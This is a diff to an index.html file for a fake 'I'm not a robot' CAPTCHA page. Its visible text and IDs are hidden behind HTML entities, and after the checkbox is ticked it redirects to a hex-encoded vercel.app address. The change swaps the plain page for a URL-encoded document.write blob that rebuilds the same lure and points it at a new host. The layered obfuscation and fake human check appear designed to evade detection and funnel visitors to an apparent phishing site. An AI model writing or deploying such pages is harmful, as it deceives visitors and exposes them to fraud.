--- a/index.html
+++ b/index.html
@@ -1,148 +1,5 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<title>&#8203;</title>
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-
-<style>
-body{
-  margin:0;
-  background:#fff;
-  font-family:'Segoe UI',sans-serif;
-  display:flex;
-  justify-content:center;
-  align-items:center
-}
-.shell-card{
-  position:relative;
-  top:265px;
-  background:#fff;
-  padding:30px 22px;
-  border-radius:18px;
-  box-shadow:0 10px 25px rgba(0,0,0,.08);
-  text-align:center;
-  width:90%;
-  max-width:300px
-}
-.logo-bubble{
-  width:60px;
-  height:60px;
-  margin:0 auto 20px;
-  background:linear-gradient(135deg,#3a7bfd,#21e1b6);
-  border-radius:50%;
-  display:flex;
-  align-items:center;
-  justify-content:center
-}
-.logo-bubble svg{width:26px;height:26px;fill:#fff}
-.main-title{
-  font-size:18px;
-  font-weight:600;
-  color:#222
-}
-.instruction{
-  font-size:13px;
-  color:#555;
-  margin-bottom:16px
-}
-.confirm-zone{
-  display:flex;
-  align-items:center;
-  justify-content:center;
-  gap:10px;
-  margin-bottom:18px
-}
-.auth-box{
-  appearance:none;
-  width:15px;
-  height:15px;
-  border:2px solid #3a7bfd;
-  border-radius:6px;
-  cursor:pointer
-}
-.auth-box:checked{background:#3a7bfd}
-.auth-box:checked::after{
-  content:'\2713';
-  color:#fff;
-  position:absolute;
-  font-size:13px
-}
-.caption-text{font-size:15px}
-.signal-area{
-  font-size:14px;
-  color:gray;
-  min-height:22px
-}
-.signal-area.confirmed{
-  color:green;
-  font-weight:500
-}
-</style>
-</head>
-
-<body>
-
-<div class="shell-card">
-
-  <div class="logo-bubble">
-    <svg viewBox="0 0 24 24">
-      <path d="M12 1a5 5 0 0 0-5 5v3H6c-1.1 0-2 .9-2 2v9c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2v-9c0-1.1-.9-2-2-2h-1V6a5 5 0 0 0-5-5z"/>
-    </svg>
-  </div>
-
-  <div class="main-title">
-    C&#111;nf&#105;rm&#97;t&#105;&#111;n
-  </div>
-
-  <div class="instruction">
-    Pl&#101;&#97;se c&#111;nf&#105;rm y&#111;&#117;&#39;re n&#111;t &#97;&#117;t&#111;m&#97;t&#101;d
-  </div>
-
-  <div class="confirm-zone">
-    <input type="checkbox"
-           class="auth-box"
-           id="s&#101;c&#117;r&#101;B&#111;x">
-    <div class="caption-text">
-      I&#39;m n&#111;t &#97; r&#111;b&#111;t
-    </div>
-  </div>
-
-  <div class="signal-area" id="&#111;utp&#117;tA&#114;&#101;a">
-    Aw&#97;&#105;t&#105;ng &#97;ct&#105;&#111;n&#46;&#46;&#46;
-  </div>
-
-</div>
-
 <script>
-const c=document.getElementById("s\u0065cureBox");
-const m=document.getElementById("outputArea");
-
-let v=false;
-let t=Date.now();
-
-c.addEventListener("click",()=>{
-  const d=Date.now()-t;
-  if(v||c.disabled)return;
-  if(c.checked){
-    if(d<1000){
-      c.checked=false;
-      c.disabled=true;
-      m.textContent="\uD83D\uDEAB \u0042\u006F\u0074 \u0061\u0063\u0074\u0069\u0076\u0069\u0074\u0079 \u0064\u0065\u0074\u0065\u0063\u0074\u0065\u0064\u002E";
-      m.style.color="crimson";
-      setTimeout(()=>location.reload(),1200);
-    }else{
-      v=true;
-      m.innerHTML="\u2705 <strong>C\u006F\u006E\u0066\u0069\u0072\u006D\u0065\u0064 \u0061\u0073 \u0068\u0075\u006D\u0061\u006E</strong>";
-      m.classList.add("confirmed");
-      c.disabled=true;
-      setTimeout(()=>{
-        window.location.href= "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x79\x75\x6e\x6f\x6c\x70\x6f\x6d\x75\x79\x2e\x76\x65\x72\x63\x65\x6c\x2e\x61\x70\x70\x2f";
-      },2000);
-    }
-  }
-});
+<!--
+document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%3Cmeta%20charset%3D%22UTF-8%22%20/%3E%0A%3Ctitle%3E%26%238203%3B%3C/title%3E%0A%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1.0%22%20/%3E%0A%0A%3Cstyle%3E%0Abody%7B%0A%20%20margin%3A0%3B%0A%20%20background%3A%23fff%3B%0A%20%20font-family%3A%27Segoe%20UI%27%2Csans-serif%3B%0A%20%20display%3Aflex%3B%0A%20%20justify-content%3Acenter%3B%0A%20%20align-items%3Acenter%0A%7D%0A.shell-card%7B%0A%20%20position%3Arelative%3B%0A%20%20top%3A265px%3B%0A%20%20background%3A%23fff%3B%0A%20%20padding%3A30px%2022px%3B%0A%20%20border-radius%3A18px%3B%0A%20%20box-shadow%3A0%2010px%2025px%20rgba%280%2C0%2C0%2C.08%29%3B%0A%20%20text-align%3Acenter%3B%0A%20%20width%3A90%25%3B%0A%20%20max-width%3A300px%0A%7D%0A.logo-bubble%7B%0A%20%20width%3A60px%3B%0A%20%20height%3A60px%3B%0A%20%20margin%3A0%20auto%2020px%3B%0A%20%20background%3Alinear-gradient%28135deg%2C%233a7bfd%2C%2321e1b6%29%3B%0A%20%20border-radius%3A50%25%3B%0A%20%20display%3Aflex%3B%0A%20%20align-items%3Acenter%3B%0A%20%20justify-content%3Acenter%0A%7D%0A.logo-bubble%20svg%7Bwidth%3A26px%3Bheight%3A26px%3Bfill%3A%23fff%7D%0A.main-title%7B%0A%20%20font-size%3A18px%3B%0A%20%20font-weight%3A600%3B%0A%20%20color%3A%23222%0A%7D%0A.instruction%7B%0A%20%20font-size%3A13px%3B%0A%20%20color%3A%23555%3B%0A%20%20margin-bottom%3A16px%0A%7D%0A.confirm-zone%7B%0A%20%20display%3Aflex%3B%0A%20%20align-items%3Acenter%3B%0A%20%20justify-content%3Acenter%3B%0A%20%20gap%3A10px%3B%0A%20%20margin-bottom%3A18px%0A%7D%0A.auth-box%7B%0A%20%20appearance%3Anone%3B%0A%20%20width%3A15px%3B%0A%20%20height%3A15px%3B%0A%20%20border%3A2px%20solid%20%233a7bfd%3B%0A%20%20border-radius%3A6px%3B%0A%20%20cursor%3Apointer%0A%7D%0A.auth-box%3Achecked%7Bbackground%3A%233a7bfd%7D%0A.auth-box%3Achecked%3A%3Aafter%7B%0A%20%20content%3A%27%5C2713%27%3B%0A%20%20color%3A%23fff%3B%0A%20%20position%3Aabsolute%3B%0A%20%20font-size%3A13px%0A%7D%0A.caption-text%7Bfont-size%3A15px%7D%0A.signal-area%7B%0A%20%20font-size%3A14px%3B%0A%20%20color%3Agray%3B%0A%20%20min-height%3A22px%0A%7D%0A.signal-area.confirmed%7B%0A%20%20color%3Agreen%3B%0A%20%20font-weight%3A500%0A%7D%0A%3C/style%3E%0A%3C/head%3E%0A%0A%3Cbody%3E%0A%0A%3Cdiv%20class%3D%22shell-card%22%3E%0A%0A%20%20%3Cdiv%20class%3D%22logo-bubble%22%3E%0A%20%20%20%20%3Csvg%20viewBox%3D%220%200%2024%2024%22%3E%0A%20%20%20%20%20%20%3Cpath%20d%3D%22M12%201a5%205%200%200%200-5%205v3H6c-1.1%200-2%20.9-2%202v9c0%201.1.9%202%202%202h12c1.1%200%202-.9%202-2v-9c0-1.1-.9-2-2-2h-1V6a5%205%200%200%200-5-5z%22/%3E%0A%20%20%20%20%3C/svg%3E%0A%20%20%3C/div%3E%0A%0A%20%20%3Cdiv%20class%3D%22main-title%22%3E%0A%20%20%20%20C%26%23111%3Bnf%26%23105%3Brm%26%2397%3Bt%26%23105%3B%26%23111%3Bn%0A%20%20%3C/div%3E%0A%0A%20%20%3Cdiv%20class%3D%22instruction%22%3E%0A%20%20%20%20Pl%26%23101%3B%26%2397%3Bse%20c%26%23111%3Bnf%26%23105%3Brm%20y%26%23111%3B%26%23117%3B%26%2339%3Bre%20n%26%23111%3Bt%20%26%2397%3B%26%23117%3Bt%26%23111%3Bm%26%2397%3Bt%26%23101%3Bd%0A%20%20%3C/div%3E%0A%0A%20%20%3Cdiv%20class%3D%22confirm-zone%22%3E%0A%20%20%20%20%3Cinput%20type%3D%22checkbox%22%0A%20%20%20%20%20%20%20%20%20%20%20class%3D%22auth-box%22%0A%20%20%20%20%20%20%20%20%20%20%20id%3D%22s%26%23101%3Bc%26%23117%3Br%26%23101%3BB%26%23111%3Bx%22%3E%0A%20%20%20%20%3Cdiv%20class%3D%22caption-text%22%3E%0A%20%20%20%20%20%20I%26%2339%3Bm%20n%26%23111%3Bt%20%26%2397%3B%20r%26%23111%3Bb%26%23111%3Bt%0A%20%20%20%20%3C/div%3E%0A%20%20%3C/div%3E%0A%0A%20%20%3Cdiv%20class%3D%22signal-area%22%20id%3D%22%26%23111%3Butp%26%23117%3BtA%26%23114%3B%26%23101%3Ba%22%3E%0A%20%20%20%20Aw%26%2397%3B%26%23105%3Bt%26%23105%3Bng%20%26%2397%3Bct%26%23105%3B%26%23111%3Bn%26%2346%3B%26%2346%3B%26%2346%3B%0A%20%20%3C/div%3E%0A%0A%3C/div%3E%0A%0A%3Cscript%3E%0Aconst%20c%3Ddocument.getElementById%28%22s%5Cu0065cureBox%22%29%3B%0Aconst%20m%3Ddocument.getElementById%28%22outputArea%22%29%3B%0A%0Alet%20v%3Dfalse%3B%0Alet%20t%3DDate.now%28%29%3B%0A%0Ac.addEventListener%28%22click%22%2C%28%29%3D%3E%7B%0A%20%20const%20d%3DDate.now%28%29-t%3B%0A%20%20if%28v%7C%7Cc.disabled%29return%3B%0A%20%20if%28c.checked%29%7B%0A%20%20%20%20if%28d%3C1000%29%7B%0A%20%20%20%20%20%20c.checked%3Dfalse%3B%0A%20%20%20%20%20%20c.disabled%3Dtrue%3B%0A%20%20%20%20%20%20m.textContent%3D%22%5CuD83D%5CuDEAB%20%5Cu0042%5Cu006F%5Cu0074%20%5Cu0061%5Cu0063%5Cu0074%5Cu0069%5Cu0076%5Cu0069%5Cu0074%5Cu0079%20%5Cu0064%5Cu0065%5Cu0074%5Cu0065%5Cu0063%5Cu0074%5Cu0065%5Cu0064%5Cu002E%22%3B%0A%20%20%20%20%20%20m.style.color%3D%22crimson%22%3B%0A%20%20%20%20%20%20setTimeout%28%28%29%3D%3Elocation.reload%28%29%2C1200%29%3B%0A%20%20%20%20%7Delse%7B%0A%20%20%20%20%20%20v%3Dtrue%3B%0A%20%20%20%20%20%20m.innerHTML%3D%22%5Cu2705%20%3Cstrong%3EC%5Cu006F%5Cu006E%5Cu0066%5Cu0069%5Cu0072%5Cu006D%5Cu0065%5Cu0064%20%5Cu0061%5Cu0073%20%5Cu0068%5Cu0075%5Cu006D%5Cu0061%5Cu006E%3C/strong%3E%22%3B%0A%20%20%20%20%20%20m.classList.add%28%22confirmed%22%29%3B%0A%20%20%20%20%20%20c.disabled%3Dtrue%3B%0A%20%20%20%20%20%20setTimeout%28%28%29%3D%3E%7B%0A%20%20%20%20%20%20%20%20window.location.href%3D%20%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx73%5Cx3a%5Cx2f%5Cx2f%5Cx73%5Cx61%5Cx69%5Cx6e%5Cx74%5Cx67%5Cx6f%5Cx62%5Cx69%5Cx6e%5Cx73%5Cx61%5Cx6c%5Cx65%5Cx73%5Cx2e%5Cx76%5Cx65%5Cx72%5Cx63%5Cx65%5Cx6c%5Cx2e%5Cx61%5Cx70%5Cx70%5Cx2f%22%3B%0A%20%20%20%20%20%20%7D%2C2000%29%3B%0A%20%20%20%20%7D%0A%20%20%7D%0A%7D%29%3B%0A%3C/script%3E%0A%0A%3C/body%3E%0A%3C/html%3E"));
+//-->
 </script>
-
-</body>
-</html>
